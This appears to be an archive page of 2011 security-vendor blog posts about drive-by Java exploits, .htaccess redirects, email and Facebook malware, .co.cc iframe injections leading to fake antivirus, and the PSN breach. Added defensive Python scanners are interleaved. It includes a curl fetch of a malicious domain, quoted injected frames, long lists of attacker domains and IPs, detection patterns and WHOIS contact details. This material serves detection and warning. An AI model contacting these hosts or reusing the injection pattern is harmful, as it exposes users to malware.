Of course, even court-sanctioned auto-cleanup wouldn’t solve the real problem. Hundreds of thousands of users in the US (and many more than that overseas) have allowed themselves to get and to remain infected by malware which is comparatively easy to detect, remove and prevent.

As the FBI’s court application wryly notes in conclusion:

While the use of an “uninstall” command to remove Coreflood cannot be considered a replacement for the use of properly configured and updated anti-virus software, removing Coreflood from infected computers will at least serve to eliminate a known threat to that victim’s privacy and financial security.

These infected PCs actually pose a known threat not only to the victims, but also to the internet as a whole, and they advertise their infection by openly calling home to the C&C servers.

So, perhaps the FBI should have applied for permission to go at the problem in a much more gung-ho fashion, without the written permission clause?

What do you think?

Posted in Sophos

Free anti-virus for Mac named Best Anti-Malware solution at SC Awards

Who would have thought it? A free anti-virus program for Apple Macs being named best anti-malware solution ahead of those security products for boring old Windows.

Well, that’s exactly what happened at the SC Magazine Awards Europe 2011, held last week at the London Hilton on Park Lane.

Over 530 of the industry’s top companies saw Sophos Anti-Virus for Mac Home Edition successfully beat rivals including products from McAfee, Kaspersky and Symantec to win the coveted title of Best Anti-Malware Solution, at the glittering awards dinner.

Naked Security’s own Carole Theriault was on hand to receive the award, flanked by Qualys CEO Philippe Courtot and dead-pan comedian Stewart Francis.

Carole Theriault receives award at SC Magazine

Carole was uncharacteristically lost for words when I asked her how she felt, but I think what has surprised all of us is just how open Mac users are becoming to the idea of securing their computers with anti-malware software.

Although the number of malware threats targeting Mac OS X is far smaller than for Windows, that doesn’t mean that they are non-existent. And Sophos’s free anti-virus for Mac home users has opened many eyes to the fact that security doesn’t have to be an unpleasant experience.

Sophos Anti-Virus for Mac Home Edition’s success at the awards wasn’t the end of the night as far as Sophos was concerned. The company was also named Information Security Vendor of the Year.

A tremendous result in such a competitive marketplace. Our thanks go to SC Magazine’s judging panel for recognising the hard work done by everyone at Sophos in the last year, and for our users and readers for supporting us!

And if you’re still dithering about whether you should run an anti-virus on your Mac at home, then do read the reviews… and then download our free Mac anti-virus. :-)

Posted in Sophos

A case of malware starring Mario, or should it be Wario?

I always find it interesting to know what goes on in cyber criminals’ minds.

Lately I’ve been observing a deluge of websites being hacked and serving drive-by downloads in the form of Java exploits under the name mario.jar.

Below is a screen cap of some of those caught by our HoneyPots:

On the left hand side are sites that have been hacked and on the right hand side is the payload URL.

When our HoneyPots crawl these sites, here is what happens:

I wanted to see for myself what such an attack looks like, so I fired up my browser and put on special glasses ;-)

Let’s take a closer look:

We have our browser, Internet Explorer, launching a Java applet (don’t mind Notepad, it’s just me viewing the HTML source code). Oh, and I also renamed Process Explorer to iexplore.exe so the malware won’t kill it.

In fact in this attack we can see there is more than just one exploit. (Note the HelpCtr.exe buffer overflow).

But it really all begins with the Java applet, mario.jar:

It contains a bunch of classes which work together to deliver the payload (an executable).

The code is written in such a way that the intent is not obvious:

In fact, VirusTotal detections are very low (2/42).

In this particular case, the payload is a ransom Trojan forcing you to dial a number to get a code to unlock your computer:

Let’s get back to the whole Mario thing. The bad guys really should have picked Mario’s nemesis instead: Wario hosing down computers with malware!

Creative Commons image of Wario courtesy of favelitu.

Jerome Segura

Posted in Security

infernomag.com / gtracking.org nastiness

Some sort of .htaccess hack is going on, redirecting users to infernomag.com and then on to a malicious site that looks like it’s downloading a Zbot variant. It only seems to work with Internet Explorer, and only when the page is accessed from a search engine (like Google). infernomag.com is hosted on 85.17.132.194 (Leaseweb) which is the same server as gtracking.org which alters the .htaccess file as described here.

infernomag.com then redirects users to one of at least two Leaseweb-hosted servers at 85.17.19.201 and 85.17.19.203 (possibly others). These servers have a number of domains on them that appear to belong to legitimate domains registered at GoDaddy by (mostly) UK users – it is likely that their domain control panels have been compromised. Examples are:

actually2.weddingphotographersurrey.net
amount9.gwdempseyjr.com
are5.gwdempseyjr.com
background1.photographbcn.com
brought0.gwdempseyjr.com
captain5.photographbcn.com
captain6.gwdempseyjr.com
charge7.photographbcn.com
signal6.photographbcn.com
completely8.gwdempseyjr.com
congress1.airduct-ventcleaning-mn.com
hard9.photographbcn.com
leading1.airduct-ventcleaning-mn.com
party4.gwdempseyjr.com
providence5.gwdempseyjr.com
safe1.gwdempseyjr.com
she1.weddingphotographerkent.net
tax6.weddingphotographersurrey.net
theory7.weddingphotographerkent.net
am1.theimperialsuspects.com
area6.bettyjaneware.com
belief7.theimperialsuspects.com
contact2.theimperialsuspects.com
cultural5.boneki.com
direct2.theimperialsuspects.com
enemy2.theimperialsuspects.com
baby3.trycue.com
liberal6.trycue.com
most0.ladyofvirtuestore.com
professional0.ladyofvirtuestore.com

Two domains on those servers that do not fit the pattern are:
gfaster.net
fortreecom.net

The WHOIS details are probably fake; for infernomag.com and gtracking.org they are:

   Felix Maurer
   sherman66@ymail.com
   Waldowstr. 61
   Gschwend   Gschwend
   74417   DE
   +49 98466101

fortreecom.net uses the same email address but a different name:

   Bernd Austerlit        (sherman66@ymail.com)
   Alt Reinickendorf 94
   Ziemetshausen
   Bayern,86471
   DE
   Tel. +82.84991251

Detection rates are rubbish. AntiVir detects the payload as TR/Dropper.Gen, BitDefender as Gen:Variant.Zbot.34, Ikarus as Trojan.Win32.Pirminay and Sophos as Mal/Ponmocup-A. Other products do not seem to detect anything at all.

Blocking those IPs of 85.17.132.194, 85.17.19.201 and 85.17.19.203 is safer than trying to block the domains. Blocking the whole /24s instead would probably cause very little inconvenience.
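The conditional redirect and the network blocking described above, as an added example (this is not code from the original post): a small Python scanner that reads an .htaccess file and reports RewriteRules that send visitors off-site only when the RewriteConds in front of them test the referer for a search engine or test the user agent, plus a check of whether an address falls inside the /24s around the three Leaseweb addresses named in the post. The .htaccess fragment, the redirect host and the victim host are constructed placeholders.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Constructed .htaccess fragment of the shape the post describes: a rewrite
# that only fires for visitors arriving from a search engine with Internet
# Explorer and sends them off-site. The redirect host is a placeholder.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|yahoo|bing)\\. [NC,OR]
RewriteCond %{HTTP_REFERER} (ask|aol)\\. [NC]
RewriteCond %{HTTP_USER_AGENT} MSIE [NC]
RewriteRule ^(.*)$ http://redirector.example.invalid/in.php [R=302,L]
RewriteRule ^index\\.html$ /home/ [R,L]
"""

SEARCH_ENGINES = re.compile(r"google|yahoo|bing|ask|aol|msn", re.I)

# The three Leaseweb addresses named in the post, widened to their /24s as suggested.
BLOCKED_HOSTS = ["85.17.132.194", "85.17.19.201", "85.17.19.203"]
BLOCKED_NETS = {ipaddress.ip_network(f"{ip}/24", strict=False) for ip in BLOCKED_HOSTS}


def _is_redirect(flags: str) -> bool:
    """True if a RewriteRule flag list such as [R=302,L] contains R or R=nnn."""
    items = flags.strip("[]").split(",") if flags else []
    return any(f == "R" or f.startswith("R=") for f in items)


def suspicious_redirects(htaccess: str, own_host: str) -> list:
    """Return RewriteRules that redirect off-site and are gated on the visitor's
    referer or user agent, each with the reasons it was flagged. An unconditional
    off-site redirect is not reported: those are often legitimate."""
    findings = []
    pending = []  # RewriteCond lines that apply to the next RewriteRule
    for raw in htaccess.splitlines():
        line = raw.strip()
        if line.startswith("RewriteCond"):
            pending.append(line)
            continue
        if not line.startswith("RewriteRule"):
            continue
        parts = line.split()
        target = parts[2] if len(parts) > 2 else ""
        flags = parts[3] if len(parts) > 3 else ""
        conds = " ".join(pending)
        pending = []
        host = urlparse(target).hostname
        external = bool(host) and host != own_host and _is_redirect(flags)
        reasons = []
        if "HTTP_REFERER" in conds and SEARCH_ENGINES.search(conds):
            reasons.append("gated on search-engine referer")
        if "HTTP_USER_AGENT" in conds:
            reasons.append("gated on user agent")
        if external and reasons:
            findings.append({"rule": line, "target": host, "reasons": reasons})
    return findings


def is_blocked(ip: str) -> bool:
    """True if the address falls inside one of the blocked /24 networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BLOCKED_NETS)


if __name__ == "__main__":
    for hit in suspicious_redirects(SAMPLE_HTACCESS, "victim.example.invalid"):
        print(hit)
    print(is_blocked("85.17.19.77"), is_blocked("85.17.20.1"))
```

The scanner deliberately ignores an off-site redirect with no conditions in front of it, since moved pages are redirected that way legitimately; it is the combination of off-site target and visitor-dependent gating that matches the cloaking the post describes. Run it over every .htaccess a web server can read, not just the document root, since the injected rules are often dropped into subdirectories.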

Posted in Security

FedEx used for continued email malware – Zombies up 70%

It’s been almost one month since we reported on the huge increase in email-borne malware attachments. The outbreaks have continued on an almost daily basis since then, and we have noted a corresponding dramatic increase of over 70% in the number of zombies.

The traffic graph below shows the continued outbreaks (orange line).  As noted previously the levels shown below have not been seen for well over one year.  The outbreaks often reach levels of 20-40% of all email traffic.

Initially the attachments were “UPS package notifications”.  Then the subjects changed focus to “DHL package notifications”.  The zip attachment however, remained “UPS.exe” leading us to conclude that DHL were transporting UPS malware.

And now (the most logical step we suppose..) the subjects have changed to FedEx package notifications.  The attached “document.zip” file still extracts to “UPS.exe”.  The body text is actually an image served from a variety of fast changing domains.  The body of the email includes random text with a 1-point font size and white color.  In this example the text reads “fwa dp ud gn vbg we ayf zv ole” (yes – that’s quite random.)

dear customer the parcel was sent your home address and it will arrive within 7 business day.  more information and the tracking number are attached in the document below.  thank you
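The traits listed above (an image-only body, 1-point white filler text, and a document.zip that extracts to UPS.exe) make a usable mail-gateway heuristic. The following Python is an added example, not Commtouch’s code: it builds a constructed message of that shape (the UPS.exe inside the zip is a harmless placeholder stub, not a sample) and then checks any message for the three traits, using only the standard library.

```python
import email
import io
import re
import zipfile
from email import policy
from email.message import EmailMessage

# Elements carrying an inline style: tag name, style attribute, inner text.
STYLED = re.compile(r'<(\w+)[^>]*style="([^"]*)"[^>]*>(.*?)</\1>', re.I | re.S)
EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".com", ".bat", ".cmd")


def build_sample_message() -> bytes:
    """Constructed message with the shape the post describes. The UPS.exe
    inside the zip is a placeholder stub, not a real sample."""
    msg = EmailMessage()
    msg["From"] = "FedEx Notification <noreply@example.invalid>"
    msg["To"] = "customer@example.invalid"
    msg["Subject"] = "FedEx package notification"
    html = (
        '<html><body><img src="http://example.invalid/notice.png">'
        '<span style="font-size:1pt; color:#ffffff">fwa dp ud gn vbg we ayf zv ole</span>'
        "</body></html>"
    )
    msg.add_alternative(html, subtype="html")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("UPS.exe", b"placeholder stub, not executable content")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="document.zip")
    return msg.as_bytes()


def is_hidden_style(style: str) -> bool:
    """Tiny font or white text: the filler described in the post."""
    s = style.lower().replace(" ", "")
    tiny = re.search(r"font-size:[01](\.\d+)?p[tx](;|$)", s) is not None
    white = re.search(r"(^|;)color:(#fff(fff)?|white)(;|$)", s) is not None
    return tiny or white


def analyse_message(raw: bytes) -> dict:
    """Report hidden filler text, image-only HTML bodies and executables
    inside zip attachments; flag the message if the combination matches."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    report = {"hidden_text": [], "image_only_body": False, "exe_in_zip": []}
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            html = part.get_content()
            report["hidden_text"].extend(
                m.group(3) for m in STYLED.finditer(html) if is_hidden_style(m.group(2)))
            # Drop hidden elements, then strip tags to see what a reader would see.
            shown = STYLED.sub(lambda m: "" if is_hidden_style(m.group(2)) else m.group(0), html)
            visible = re.sub(r"<[^>]+>", " ", shown).strip()
            report["image_only_body"] = "<img" in html.lower() and visible == ""
        elif (part.get_filename() or "").lower().endswith(".zip"):
            try:
                with zipfile.ZipFile(io.BytesIO(part.get_content())) as zf:
                    report["exe_in_zip"].extend(
                        n for n in zf.namelist() if n.lower().endswith(EXECUTABLE_EXT))
            except zipfile.BadZipFile:
                report["exe_in_zip"].append("<unreadable zip>")
    report["suspicious"] = bool(report["exe_in_zip"]) or (
        bool(report["hidden_text"]) and report["image_only_body"])
    return report


if __name__ == "__main__":
    print(analyse_message(build_sample_message()))
```

The executable-in-zip check is the decisive one for this campaign; the hidden-text and image-only checks are weaker on their own (newsletters use tiny text for tracking too), which is why the verdict only combines them when both are present.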

Posted in Commtouch

500 free credits from Facebook – malware

There’s no such thing as a free lunch – or free Facebook credits.  As proof consider the attack described below which has several stages:

1) Users get messages with offers of “free Facebook credits”

2) These trick users into running a malicious JavaScript

3) The infected user is led to a website – which probably offers the malware distributor some pay-per-click revenue

4) The malicious script sends out more “free Facebook credits” messages and the cycle starts again

The attack starts in several ways but always includes messages from a compromised friend account:

  • A message with detailed instructions that require actively running a malicious JavaScript:

  • A chat message with the text: “%firstname% just tried this and got 500 Facebook credits works great <bad link>” (The link provides instructions similar to those above about loading the code into the address bar).

  • A message is posted on the compromised user’s wall: “Did you guys hear about the Facebook glitch you can get 500 Facebook credits? check it out <bad link>”.

  • An event invitation with similar free credit content and a link to the instructions website.

Once a user follows the instructions the JavaScript malware will do the following:

1. Redirect the user to a “confirm your identity” page.

2. Users clicking on “Continue” will then be directed to a verification dialog box with a link to “Get the New iPhone 4 Right Here”.

3. The final destination for those clicking on the iPhone 4 link will be the Smiley Central website.

A certain number of the compromised user’s friends will now receive the “500 free credits” messages.  Not all friends will receive the message – in one script sample I analyzed the message was sent to 15 friends.  In other scripts some of the details changed but the message and method basically remained the same.

Commtouch’s Command Antivirus detects the JavaScript as malware: JS/Agent.ON.

Be careful when trusting messages, even from your friends. Safe Browsing!

Posted in Commtouch

Caveat Emptor: Malware Links in Craigslist Ads

Yesterday, over 40 Blue Coat Web Filter customers went boat shopping on Craigslist.

How do I know this? Well, there were 42 requests to a malware domain that was being used in Craigslist ads all over the country. Here’s a sample screenshot:

Screenshot of the malicious ad on Craigslist

comtominue.com is part of a fake-warez network that normally uses what we call the “fake Facebook foto” attack. Currently, however, it’s experimenting with Craigslist as a vector for its fake-photo malware, and it seems to be effective at drawing visitors/victims, at least based on yesterday’s sample.

The site/traffic/payload characteristics from comtominue.com were sufficient for WebPulse to dynamically flag all of these requests as Suspicious, so BCWF users were safe from the download. (As of today, over 24 hours into the attack, Virustotal is still only showing 5 hits out of 42 AV engines on the download, showing once again the value added by a defense based on different factors.)

Taking a quick run through the logs of one of our datacenters, I see that the same ad appears to be running on Craigslist sites in Boston, Dallas, Spacecoast (I had to look that one up), Tulsa, Richmond, Phoenix, St Louis, Columbia, and more. A little googling turned up even more cities, and also showed that the same ad is appearing on various other classified ad sites.

Let the buyer beware, indeed.

–C.L.

Posted in SEO

Jquery4html.co.cc – Malware update – Fake AV redirections

Weekly (kinda daily) malware update. You can track all updates by following our malware_updates category.

*If your site has been affected with any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help or if you want to share some information with us.


Today we started to see a lot of sites infected with an iframe malware from jquery4html.co.cc (yes, always the .co.cc). What is funny is that when we tried to access this site to identify what was going on, we were greeted with a page from the .co.cc registrar saying that the domain was available:

The domain jquery4html.co.cc is available Continue to registration >>

If you want to build a site at this address, please visit us at www.co.cc


We found that very strange and tried to register the domain to see what was going on (their registration is free), but when we were close to completing the registration they said that the domain was not available anymore… Too bad.

A few hours later, that domain was already loading additional malicious iframes from diagnostic-scanner-xp-protection.com, hilitsors.cz.cc and many other intermediaries:

$ curl http://jquery4html.co.cc
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<title>Security report #7233 / 2011-04-25..

<frameset rows="*,90">
<frame src="http://diagnostic-scanner-xp-protection.com/index2.php?06a..
<frame src="http://hilitsors.cz.cc/xp/index.php?tp=3..7405e1" noresize scrolling..
..

There are many other sites being used as intermediaries (and just by looking at the domain names you can guess that they try to push the infamous Fake AV), including hundreds of .com:

hilitsors.cz.cc
tempviews.cz.cc
viables.cz.cc
antivcastscanwinxp.com
antivirbestbabyscan.com
antivirbestbarsscan.com
antivirbestdietscan.com
antivirbestgamesscan.com
antivirbestscan.com
antivirus-best-blog-scan.com
antivirusbestblogscan.com
antivirusbestdownloadscan.com
antivirus-best-scan.com
antivirusbestsolutionscan.com
antivirusfirstamendmentscan.com
antivirusfirstladyscan.com
antivirusfirstnationsscan.com
antivirusgreatdepressionscan.com
antivirusgreatesthitsscan.com
antivirusgreatlakesscan.com
antivmagazinescanwinxp.com
antivscancomputerswinxp.com
antivscancorporationwinxp.com
antivscandefinitionwinxp.com
antivscandocumentswinxp.com
antivscanengineswinxp.com
antivscanenginewinxp.com
antivscanimageswinxp.com
antivscanspeedwinxp.com
antivscantechnologieswinxp.com
antivscantoolswinxp.com
antivscantoolwinxp.com
anti-v-scan-winxp.com
antivscanwinxp.com
bestbonescanantiv.com
bestcolourscanantiv.com
bestlaserscanantiv.com
bestliverscanantiv.com
bestlungscanantiv.com
bestprogressivescanantiv.com
bestquickscanantiv.com
bestscanadamantiv.com
bonescanantivfree.com
cardscannerprotectionfast.com
cardscannerprotectionfree.com
card-scanner-win-protection.com
cardscannerwinprotection.com
card-scanner-xp-protection.com
cardscannerxpprotection.com
cheapscannerprotectionfast.com
cheapscannerprotectionfree.com
cheapscannerwinprotection.com
cheap-scanner-xp-protection.com
cheapscannerxpprotection.com
codescannerprotectionfast.com
codescannerprotectionfree.com
codescannerwinprotection.com
code-scanner-xp-protection.com
codescannerxpprotection.com
colorscannerprotectionfast.com
colorscannerprotectionfree.com
colorscannerwinprotection.com
color-scanner-xp-protection.com
colorscannerxpprotection.com
colourscanantivfree.com
compactscannerprotectionfast.com
compactscannerprotectionfree.com
compactscannerwinprotection.com
compact-scanner-xp-protection.com
compactscannerxpprotection.com
desktopscannerprotectionfast.com
desktopscannerprotectionfree.com
desktopscannerwinprotection.com
desktop-scanner-xp-protection.com
desktopscannerxpprotection.com
diagnosticscannerprotectionfast.com
diagnosticscannerprotectionfree.com
diagnosticscannerwinprotection.com
diagnostic-scanner-xp-protection.com
diagnosticscannerxpprotection.com
digitalscannerprotectionfast.com
digitalscannerprotectionfree.com
digitalscannerwinprotection.com
digital-scanner-xp-protection.com
digitalscannerxpprotection.com
documentscannerprotectionfast.com
documentscannerprotectionfree.com
documentscannerwinprotection.com
document-scanner-xp-protection.com
documentscannerxpprotection.com
imagescannerprotectionfast.com
imagescannerprotectionfree.com
imagescannerwinprotection.com
image-scanner-xp-protection.com
imagescannerxpprotection.com
laserscanantivfree.com
liverscanantivfree.com
lungscanantivfree.com
memoryscannerprotectionfast.com
memoryscannerprotectionfree.com
memoryscannerwinprotection.com
memory-scanner-xp-protection.com
memoryscannerxpprotection.com
mobilescannerprotectionfree.com
mobilescannerwinprotection.com
mobile-scanner-xp-protection.com
mobilescannerxpprotection.com
negativescannerprotectionfree.com
negativescannerwinprotection.com
negative-scanner-xp-protection.com
negativescannerxpprotection.com
photoscannerprotectionfast.com
photoscannerprotectionfree.com
photoscannerwinprotection.com
photoscannerxpprotection.com
portablescannerprotectionfree.com
portablescannerwinprotection.com
portablescannerxpprotection.com
portscannerprotectionfree.com
portscannerwinprotection.com
portscannerxpprotection.com
printerscannerprotectionfree.com
printerscannerwinprotection.com
printerscannerxpprotection.com
progressivescanantivfree.com
protectinstantwinscanner.com
protectionboostxpscanner.com
protectioninstantwinscanner.com
protectionmicrosoftxpscanner.com
protectionsafexpscanner.com
protectionwinscan.com
protectionwinscanneralbum.com
protectionwinscanner.com
protectionwinscannerdefinition.com
protectionwinscannerdriver.com
protectwinscanneralbum.com
protect-win-scanner.com
protectwinscanner.com
protectwinscannerdefinition.com
protectwinscannerdriver.com
protectwinscannerdrivers.com
protectwinscannerfeatures.com
protectwinscannerglass.com
protectwinscannerguide.com
protectwinscannerhardware.com
protectwinscannerinterface.com
protectwinscannermaintenance.com
protectwinscannermanufacturer.com
protectwinscannermanufacturers.com
protectwinscannermaster.com
protectwinscannermodels.com
protectwinscannerprofile.com
protectwinscannerprogramming.com
quickscanantivfree.com
quickscanantivwin.com
scanadamantivfree.com
scanantbiteivfree.com
scanantcolonyivfree.com
scanantfarmivfree.com
scanantivfree.com
scanantivirusvwin.com
scanantivwcarsin.com
scanantivwdealerin.com
scanantivwdealersin.com
scanantivwdriversin.com
scanantivwenginesin.com
scanantivwgolfin.com
scanantivwin.com
scanantivwinfoin.com
scanantivwmodelsin.com
scanantivwstorein.com
scanantivwtrucksin.com
scanantivxp.com
scanaquilanerantv.com
scanbandieranerantv.com
scanborsanerantv.com
scancronacanerantv.com
scandolcenerantv.com
scan-er-antivn-oew.com
scan-er-antivnoew.com
scan-eranti-vn-oew.com
scan-eranti-vnoew.com
scan-erantivn-oew.com
scan-erantivnoew.com
scanfiumenerantv.com
scanforestanerantv.com
scanfreccianerantv.com
scanguardianerantv.com
scanner-ant-farm-iv-xp.com
scanneranthillsivxp.com
scanner-ant-iv-xp.com
scannerantlionivxp.com
scannerantv.com
scannerblueantivxp.com
scannerprotectiondogsfree.com
scannerprotectionexpertsfree.com
scannerprotectionfactorfree.com
scannerprotectionfast.com
scannerprotectionfilterfree.com
scannerprotectionfree.com
scannerprotectionfunctionsfree.com
scannerprotectionkansasfree.com
scannerprotectionmeasurefree.com
scannerprotectionmethodsfree.com
scannerprotectionofficesfree.com
scannerqueenantivxp.com
scannerwingamesprotection.com
scanner-win-protection.com
scannerwinprotection.com
scanner-win-stuff-protection.com
scannerwinstuffprotection.com
scannerxpdesktopprotection.com
scannerxpdriversprotection.com
scannerxpinstallationprotection.com
scannerxppracticesprotection.com
scannerxpprotection.com
scannerxprepairprotection.com
scannerxpstyleprotection.com
scannerxpthemesprotection.com
searchableantiv.com
slidescannerantivxp.com
slidescannerwinprotection.com
thescannerantiv.com
virus-scanner-win-protection.com
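As an added example (not Sucuri’s code), here is a Python check for the injected-frame pattern shown in the curl output above: it collects every <iframe> and <frame> on a page and flags the off-site ones that sit on a free-subdomain registrar such as .co.cc or .cz.cc, carry the scanner/protection naming pattern of the list above, or are sized or styled to be invisible. The sample page and the victim host name are constructed; the frame hosts are the ones quoted in the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page mixing a legitimate same-site embed with frames of the kinds
# quoted above. The .co.cc / .cz.cc and scanner-protection hosts are the ones
# the post names; the page itself and the victim host are placeholders.
SAMPLE_HTML = """\
<html><body>
<iframe src="/player/embed.html" width="400" height="300"></iframe>
<iframe src="http://jquery4html.co.cc/" width="1" height="1" style="visibility:hidden"></iframe>
<frameset rows="*,90">
<frame src="http://diagnostic-scanner-xp-protection.com/index2.php?06a">
<frame src="http://hilitsors.cz.cc/xp/index.php?tp=3" noresize scrolling="no">
</frameset>
</body></html>
"""

FREE_SUBDOMAIN_SUFFIXES = (".co.cc", ".cz.cc")
FAKEAV_WORDS = re.compile(r"scan|antiv|protect|virus", re.I)


class FrameCollector(HTMLParser):
    """Collect the attributes of every <iframe> and <frame> in a page."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "frame"):
            # Bare attributes such as 'noresize' arrive with value None.
            self.frames.append({k: (v or "") for k, v in attrs})


def _is_hidden(attrs: dict) -> bool:
    """A 0x0 or 1x1 frame, or one styled invisible, is not meant to be seen."""
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    style = attrs.get("style", "").replace(" ", "").lower()
    return tiny or "display:none" in style or "visibility:hidden" in style


def flag_frames(html: str, own_host: str) -> list:
    """Return the off-site frames that look like injected content, with reasons."""
    collector = FrameCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.frames:
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        if not host or host == own_host:
            continue  # relative or same-site: not the pattern the post describes
        reasons = []
        if host.endswith(FREE_SUBDOMAIN_SUFFIXES):
            reasons.append("free-registrar domain")
        if len(FAKEAV_WORDS.findall(host)) >= 2:
            reasons.append("fake-AV naming pattern")
        if _is_hidden(attrs):
            reasons.append("hidden frame")
        if reasons:
            findings.append({"host": host, "src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in flag_frames(SAMPLE_HTML, "victim.example.invalid"):
        print(finding)
```

Because the injected frame is often appended after the closing </html> tag or inside a theme file rather than the page template, feed the scanner the raw bytes served by the site (as the curl above does) rather than the files you expect to be there.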

We are seeing WordPress and Joomla sites infected with this malware, but attackers are certainly scanning for ANY type of target. So if you have a web site, make sure it is updated, you are using good passwords, etc., etc. (the normal guidelines).

We will post more details as we track them. If you have any questions, let us know. If you need help with this type of malware, we are here to assist.

Posted in Security

PlayStation Network hacked: Personal data of up to 70 million people stolen

Users of Sony’s PlayStation Network are at risk of identity theft after hackers broke into the system, and accessed the personal information of videogame players.

The implications of the hack, which resulted in the service being offline since last week, are only now becoming clear as Sony has confirmed that the hackers, who broke into the system between April 17th and April 19th, were able to access the personal data of online gamers.

In a blog post, Sony warns that hackers have been able to access a variety of personal information belonging to users including:

    * Name
    * Address (city, state, zip code)
    * Country
    * Email address
    * Date of birth
    * PlayStation Network/Qriocity password and login
    * Handle/PSN online ID

Sony statement

In addition, Sony warns that profile information – such as your history of past purchases and billing address, as well as the “secret answers” you may have given Sony for password security may also have been obtained.

As if that wasn’t bad enough, Sony admits that it cannot rule out the possibility that credit card information may also have been compromised:

While there is no evidence at this time that credit card data was taken, we cannot rule out the possibility. If you have provided your credit card data through PlayStation Network or Qriocity, out of an abundance of caution we are advising you that your credit card number (excluding security code) and expiration date may have been obtained.

The fact that credit card details, used on the network to buy games, movies and music, may also have been stolen is obviously very worrying, and affected users would be wise to keep a keen eye on their credit card statements for unexpected transactions. Questions clearly have to be asked as to whether Sony was ignorant of PCI data security standards and storing this and other personal data in an unencrypted format.
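To make the storage concern in the previous paragraph concrete, here is an added Python example (not Sony’s or Sophos’s code) of how a password and a “secret answer” can be held so that a leaked account record gives up neither the secret itself nor a value that can be replayed on another site: a per-record random salt and an iterated PBKDF2-HMAC-SHA256 hash, compared in constant time. The iteration count and the sample account are assumed values.

```python
import hashlib
import hmac
import os
from typing import Optional

# Work factor for PBKDF2-HMAC-SHA256. An assumed value: tune it upward until a
# single verification takes as long as your login path can tolerate.
ITERATIONS = 100_000


def _normalise_answer(answer: str) -> str:
    """Secret answers are matched case- and whitespace-insensitively, so
    'Rover' and ' rover ' verify the same way without storing either in clear."""
    return " ".join(answer.lower().split())


def protect(secret: str, salt: Optional[bytes] = None) -> dict:
    """Store a password or secret answer as a salted, iterated hash. Two users
    with the same secret get different records, and a leaked record cannot be
    used as a credential elsewhere."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", secret.encode("utf-8"), salt, ITERATIONS)
    return {"alg": "pbkdf2-sha256", "iterations": ITERATIONS,
            "salt": salt.hex(), "hash": digest.hex()}


def verify(secret: str, record: dict) -> bool:
    """Recompute the hash with the stored salt and compare in constant time."""
    digest = hashlib.pbkdf2_hmac("sha256", secret.encode("utf-8"),
                                 bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(digest, bytes.fromhex(record["hash"]))


def make_account(handle: str, password: str, secret_answer: str) -> dict:
    """An account record of the kind the breach exposed, with neither the
    password nor the secret answer stored in the clear."""
    return {"handle": handle,
            "password": protect(password),
            "secret_answer": protect(_normalise_answer(secret_answer))}


def check_login(account: dict, password: str) -> bool:
    return verify(password, account["password"])


def check_secret_answer(account: dict, answer: str) -> bool:
    return verify(_normalise_answer(answer), account["secret_answer"])


if __name__ == "__main__":
    acct = make_account("gamer42", "correct horse battery", "Rover")  # constructed
    print(acct)
    print(check_login(acct, "correct horse battery"), check_secret_answer(acct, " rover "))
```

Note what this does not fix: a user who reused the same password elsewhere is still exposed to guessing attacks against the leaked hash, which is why the advice below to use unique passwords stands regardless of how the operator stores them.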

So how could hackers exploit the information stolen from the Sony PlayStation Network?

1. Break into your other online accounts. We know that many people use the same password on multiple websites. So if your password was stolen from the Sony PlayStation Network, it could then be used to unlock many other online accounts – and potentially cause a bigger problem for you.

So you should always use unique passwords.

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Oh, and you better be sure that you have changed your “secret answers” too.

2. Email you phishing scams or malware attacks. If they stole your email address from Sony, they can now email you. And it wouldn’t be difficult for the cybercriminals to create an email which pretended to be a legitimate organisation (perhaps Sony themselves?) to steal more information or carried a Trojan horse designed to infect your computer. The fact that they know your name and snail-mail address could make the email even more convincing.

3. Hit you in the wallet. If your credit card details have been exposed by the Sony PlayStation Network hack then you could find fraudsters begin to make purchases from your account – if you notice that money is missing, you’ll have to go through the rigmarole of claiming the money back from your credit card company.

This security breach is not just a public relations disaster for Sony, it’s a very real danger for its many users.

If you’re a user of Sony’s PlayStation Network, now isn’t the time to sit back on your sofa and do nothing. You need to act now to minimise the chances that your identity and bank account become casualties of this hack.

That means changing your passwords, auditing your other accounts, and considering whether you should keep a closer eye on those credit card statements or simply tell your bank that, as far as you’re concerned, the card is now compromised.

More information can be found in Sony’s blog post.

Posted in Sophos

I LOVE YOU – Virus-inspired movie trailer and world premiere

The Love Bug. I LOVE YOU. LoveLetter. All different names for one of the world’s most famous viruses, which spread around the globe in May 2000, infecting millions of computers and clogging up email systems.

If you have an interest in IT and were around at the time, you’ll surely remember it. But if you don’t, you can quickly catch up by checking out my memories of those crazy days.

So what can possibly be new to say about the Love Bug? Well, on Friday a movie inspired by the malware will be getting its world premiere.

The stars of 'Subject: I love you'

I first wrote about “Subject: I Love You” way back in November 2008, but now it’s finally seeing the light of day – at 5pm on Friday 30th April, at the Newport Beach Film Festival in California.

And here is its trailer:

It certainly looks professionally done, and has some not entirely unfamiliar actors (Briana Evigan plays the female lead, ex-Superman Dean Cain has a role, and True Blood’s Kristin Bauer also features).

Want more information about the movie? Here’s the promotional puff:

